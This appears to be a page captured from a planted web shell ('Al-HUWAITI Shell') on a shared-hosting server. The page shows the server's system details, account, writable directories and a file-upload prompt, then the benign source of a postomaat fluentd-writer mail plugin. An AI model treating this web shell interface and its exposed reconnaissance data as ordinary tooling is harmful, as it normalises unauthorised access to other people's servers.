Al-HUWAITI Shell
Al-huwaiti


Server : LiteSpeed
System : Linux in-mum-web1949.main-hosting.eu 5.14.0-503.40.1.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Mon May 5 06:06:04 EDT 2025 x86_64
User : u595547767 ( 595547767)
PHP Version : 7.4.33
Disable Function : NONE
Directory :  /opt/alt/python27/lib/python2.7/site-packages/postomaat/plugins/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : //opt/alt/python27/lib/python2.7/site-packages/postomaat/plugins/fluentd_writer.py
# -*- coding: UTF-8 -*-
#   Copyright 2012-2018 Oli Schacher
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
#
#
import time
from ConfigParser import NoOptionError
from postomaat.shared import ScannerPlugin, DUNNO

try:
    from fluent import sender
    FLUENT_AVAILABLE = True
except ImportError:
    FLUENT_AVAILABLE = False


class Event(object):
    """A single record to be emitted through a fluent sender.

    :param label: label passed to the sender's ``emit_with_time``
    :param data: payload of the event; must be a ``dict``
    :param sender: optional keyword, sender object to emit through.
        Defaults to ``sender.get_global_sender()``.
    :param time: optional keyword, event timestamp. Defaults to the
        current time as integer seconds.
    """

    def __init__(self, label, data, **kwargs):
        assert isinstance(data, dict), 'data must be a dict'
        self.data = data
        self.label = label

        # Resolve the defaults lazily: the global sender is only looked up
        # when the caller did not supply one, so an explicit ``sender=``
        # does not depend on the module-level fluent ``sender`` at all.
        if 'sender' in kwargs:
            self.sender_ = kwargs['sender']
        else:
            self.sender_ = sender.get_global_sender()

        if 'time' in kwargs:
            self.timestamp = kwargs['time']
        else:
            self.timestamp = int(time.time())

    def send(self):
        """Emit the event and return whatever ``emit_with_time`` returns."""
        return self.sender_.emit_with_time(self.label, self.timestamp, self.data)


class FluentWriter(ScannerPlugin):
    """Plugin that sends selected attributes of each examined suspect to fluentd.

    ``host``, ``port`` and ``tag`` are read from the plugin's config section
    once, in the constructor. The ``fields`` option is re-read on every call
    to ``examine``.
    """

    # Names that are read as plain attributes of the suspect object; every
    # other configured name is looked up through ``suspect.get_value``.
    _SUSPECT_PROPERTIES = ('from_address', 'from_domain', 'to_address', 'to_domain')

    def __init__(self, config, section=None):
        ScannerPlugin.__init__(self, config, section)
        self.logger = self._logger()
        self.requiredvars = {
            'host': {
                'default': None,
                'description': 'Where to connect to fluentd. Local connecion if not specified.'
            },
            'port': {
                'default': '24224',
                'description': 'TCP port to send events to'
            },
            'tag': {
                'default': 'postomaat.stats',
                'description': 'Tag events sent to fluetnd'
            },
            'fields': {
                'default': 'from_address to_address from_domain to_domain size',
                'description': 'Field names or maps that should be exported'
            }
        }
        self.fieldmap = {}
        # Event fields whose values are lower-cased before sending.
        self.fields_to_lower = [
            'from_address',
            'from_domain',
            'to_address',
            'to_domain',
            'sender',
            'recipient',
            'sasl_sender',
            'sasl_username',
            'sasl_user'
        ]

        self.host = self._option_or(self.config.get, 'host', None)
        self.port = self._option_or(self.config.getint, 'port', 24224)
        self.tag = self._option_or(self.config.get, 'tag', 'postomaat.stats')

    def _option_or(self, getter, option, fallback):
        """Return ``getter(section, option)``, or ``fallback`` if the option is missing."""
        try:
            return getter(self.section, option)
        except NoOptionError:
            return fallback

    @staticmethod
    def _describe_exception(ex):
        """Return a printable ``(type name, detail)`` description of ``ex``.

        ``ex.message`` is empty for exceptions built with more than one
        argument (for example ``socket.error(errno, text)``) and does not
        exist on Python 3, so ``ex.args`` is used whenever it yields nothing.
        """
        detail = getattr(ex, 'message', '')
        if not detail:
            detail = ex.args
        return str((type(ex).__name__, detail))

    def connect(self):
        """Set up the global fluent sender unless one already exists.

        ``host`` and ``port`` are only passed to ``sender.setup`` when a host
        is configured; otherwise the sender's own defaults apply.
        """
        if sender.get_global_sender() is not None:
            return

        kw = {}
        if self.host is not None:
            kw['host'] = self.host
            kw['port'] = self.port

        sender.setup(tag=self.tag, **kw)

    def get_fieldmap(self):
        """Create the mapping from attribute names to field names based on the config string
        by default, fluentd field name is the same as Postfix Policy attribute name,
        but, to override the mapping, the config can be in the form:

        postfix_attribute:fluentd_field

        Attribute is any name that is available in the suspect object.
        That is:
        - it's an attribute name in Postfix Policy protocol
        - it was appended to suspect object by previous plugins

        eg.
        fields=to_address to_domain from_address:sender from_domain:senderdomain size

        Returns a dict keyed by fluentd field name whose values are the
        attribute names to read from the suspect.
        """
        fieldmap = {}
        for entry in self.config.get(self.section, 'fields').split():
            if ':' in entry:
                attribute, fluent_field = entry.split(':', 1)
                fieldmap[fluent_field] = attribute
            else:
                fieldmap[entry] = entry
        return fieldmap

    def build_event_data(self, suspect, fieldmap):
        """Collect the configured values from ``suspect`` into an event dict.

        :param suspect: object providing the address attributes, ``get_value``
            and a ``tags`` mapping
        :param fieldmap: dict of fluentd field name -> suspect attribute name,
            as returned by ``get_fieldmap``
        :return: dict of fluentd field name -> value, passed through
            ``normalized_event_fields``. Attributes that cannot be found are
            exported as ``None`` and a warning is logged.
        """
        event_data = {}
        for fluent_field, postfix_attr in fieldmap.items():
            if postfix_attr in self._SUSPECT_PROPERTIES:
                value = getattr(suspect, postfix_attr)
            else:
                value = suspect.get_value(postfix_attr)

            if value is None:
                if postfix_attr in suspect.tags:
                    # Tags are keyed by the attribute name, not by the
                    # (possibly renamed) fluentd field name.
                    value = suspect.tags[postfix_attr]
                else:
                    self.logger.warning("Suspect does not have attribute %s. Typo or missing plugin?",
                                        postfix_attr)

            event_data[fluent_field] = value
        return self.normalized_event_fields(event_data)

    def normalized_event_fields(self, event_data):
        """Lower-case, in place, the values of fields listed in ``fields_to_lower``.

        Values without a ``lower`` method (e.g. ``None``) are left untouched.
        Returns the same dict that was passed in.
        """
        # Iterate over a snapshot of the keys because values are reassigned
        # inside the loop.
        for field in list(event_data):
            if field not in self.fields_to_lower:
                continue
            try:
                event_data[field] = event_data[field].lower()
            except AttributeError:
                pass
        return event_data

    def lint(self):
        """Check config and fluentd connectivity; print problems, return True if all is well."""
        lint_ok = True

        if not self.check_config():
            print('Error checking config')
            lint_ok = False

        if not FLUENT_AVAILABLE:
            print("fluent-logger module is not installed")
            lint_ok = False
        else:
            try:
                self.connect()
                gs = sender.get_global_sender()
                # presumably forces a connection attempt so that an
                # unreachable fluentd raises here -- verify against fluent.sender
                gs._reconnect()
            except Exception as ex:
                print("Failed to connect to FluentD {}".format(self._describe_exception(ex)))
                lint_ok = False

        return lint_ok

    def examine(self, suspect):
        """Send one event for ``suspect``; failures are logged, never raised.

        Always returns ``DUNNO``.
        """
        try:
            self.connect()
            self.fieldmap = self.get_fieldmap()
            data = self.build_event_data(suspect, self.fieldmap)
            fluentd_event = Event(None, data)

            # A socket.error raised in fluent.sender._send_internal does not
            # propagate to us, so a falsy return value is treated as failure.
            if not fluentd_event.send():
                raise Exception('Failed to send event to fluentd, probably socket error')
        except Exception as ex: # pylint: disable=W0703
            self.logger.error("FluentD Writer plugin failed, log not written: %s",
                              self._describe_exception(ex))

        return DUNNO

    def __str__(self):
        return "FluentD Writer Plugin"

Al-HUWAITI Shell